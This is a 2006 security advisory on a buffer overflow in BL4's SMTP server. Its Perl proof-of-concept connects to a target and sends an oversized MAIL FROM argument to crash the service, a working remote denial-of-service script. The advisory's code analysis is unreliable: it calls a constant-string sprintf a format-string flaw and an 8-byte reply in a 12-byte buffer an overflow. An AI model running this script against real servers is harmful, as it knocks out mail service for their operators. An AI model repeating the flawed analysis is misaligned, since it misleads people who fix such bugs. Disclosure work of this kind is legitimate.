BL4-smtp.txt

`---------------------------------------------------------------------------  
[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable  
---------------------------------------------------------------------------  
  
Author : Dedi Dwianto  
Date : April, 27th 2006  
Location : Indonesia, Jakarta  
Web : http://advisories.echo.or.id/adv/adv30-theday-2006.txt  
Critical Lvl : High  
---------------------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
Application : BL4's SMTP server  
version : < 0.1.5  
URL : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0  
Description :  
  
BL4's SMTP server is an inbound only SMTP server.  
It currently uses hardcoded values for handling email.   
The SMTP server puts the incoming email into various text files.  
  
---------------------------------------------------------------------------  
  
Vulnerability:  
~~~~~~~~~~~~~~~~  
BL4's SMTP server is to a flaw that can allow remote attacker to  
cause a denial of service or a attacker can Execution of Arbitrary Code.  
The vulnerability is due to a buffer overflow in the SMTP service.   
A remote attacker can repeatedly send more that 2100 bytes as the argument to the HELO, MAIL FROM, and RCPT TO commands to crash the server.  
  
------------------think.c-----------------------------------  
...........  
{  
slaveEmail[x]->isData = 0;  
slaveEmail[x]->emailFrom = 0;  
slaveEmail[x]->emailTo = 0;  
free(buffer);  
buffer = malloc(sizeof(char) * 12);  
sprintf(buffer, "250 OK\r\n");  
return buffer;  
}  
free(buffer);  
.............  
slaveEmail[x]->EHLO = buffer;  
slaveEmail[x]->EHLOtrue = 1;  
  
buffer = malloc(sizeof(char) * 12);  
sprintf(buffer, "250 OK\r\n");   
return buffer;  
-----------------------------------------------------------  
--  
sprintf(buffer, "250 OK\r\n");  
--  
Vulnerable for format strings.  
  
--  
free(buffer);  
buffer = malloc(sizeof(char) * 12);  
--  
Vulnerable for buffer overflow.  
A attacker can create Arbitrary Code here .  
  
  
Poc:  
~~~~~~~~~~~~  
  
#!/usr/bin/perl  
  
use IO::Socket;  
use Socket;  
  
my($socket) = "";  
  
  
if($#ARGV < 1 | $#ARGV > 2) {usage()}  
  
if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };  
$adr = $ARGV[0];  
$prt = $ARGV[1];  
  
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,  
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";  
  
  
print " -- Connecting To SMTP server at $adr port $prt ... \n";  
  
sleep(1);  
  
print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to $adr .....\n" or die "Error : can't send Request\n";  
  
sleep(1);  
  
print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- Sending Buffer to $adr .....\n";  
  
sleep(1);  
printf("[+]Ok!\n");  
printf("[+]Crash service.....\n");  
printf("[~]Done.\n");  
  
close($socket);  
  
  
sub usage()  
{  
print "\n=========================================\r\n";  
print " BL4's SMTP server Remote DOS \r\n";  
print "=========================================\r\n";  
print " Bug Found by Dedi Dwianto \r\n";  
print " www.echo.or.id #e-c-h-o irc.dal.net \r\n";  
print " Echo Security Research Group \r\n";  
print "=========================================\r\n";  
print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";  
exit();  
}  
  
  
---------------------------------------------------------------------------  
Shoutz:  
~~~~~~~  
  
~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous  
~ [email protected]  
~ #aikmel #e-c-h-o @irc.dal.net  
---------------------------------------------------------------------------  
Contact:  
~~~~~~~~  
  
Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id  
Homepage: http://theday.echo.or.id/  
  
-------------------------------- [ EOF ] ----------------------------------  
`